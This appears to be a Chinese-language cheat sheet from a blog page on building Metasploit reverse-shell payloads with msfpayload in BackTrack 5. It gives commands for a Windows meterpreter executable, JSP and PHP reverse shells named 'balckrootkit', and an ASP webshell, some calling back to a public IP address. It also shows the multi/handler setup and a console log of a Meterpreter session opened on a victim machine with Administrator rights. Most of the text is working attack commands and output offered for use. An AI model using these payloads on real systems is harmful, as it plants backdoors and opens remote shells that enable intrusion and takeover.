BT5 msf msfpayload生成2进制 msf生成exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe


其它脚本
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226  LPORT=1234 R > balckrootkit.jsp

msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E

msfpayload php/reverse_php  LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php

msfcli multi/handler PAYLOAD=php/reverse_php  LHOST=58.60.195.226 LPORT=1234 E

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167| msfencode -t asp -o webshell.asp

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E

监听

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.85.147
LHOST => 192.168.85.147
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.85.147:4444
[*] Starting the payload handler...             //接着在目标机运行 mt.exe
[*] Sending stage (769536 bytes) to 192.168.85.160
[*] Meterpreter session 1 opened (192.168.85.147:4444 -> 192.168.85.160:1262) at 2014-08-26 10:45:11 +0800

meterpreter >


meterpreter > getuid    查看权限
Server username: K8ANTI-B2B9B81C\Administrator
meterpreter > ps   查看进程

相关文章:

  • 2021-05-13
  • 2021-06-04
  • 2022-01-01
  • 2021-06-08
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-07-24
猜你喜欢
  • 2021-08-24
  • 2022-12-23
  • 2021-05-25
  • 2021-10-31
  • 2022-01-12
  • 2022-02-05
  • 2022-01-15
相关资源
相似解决方案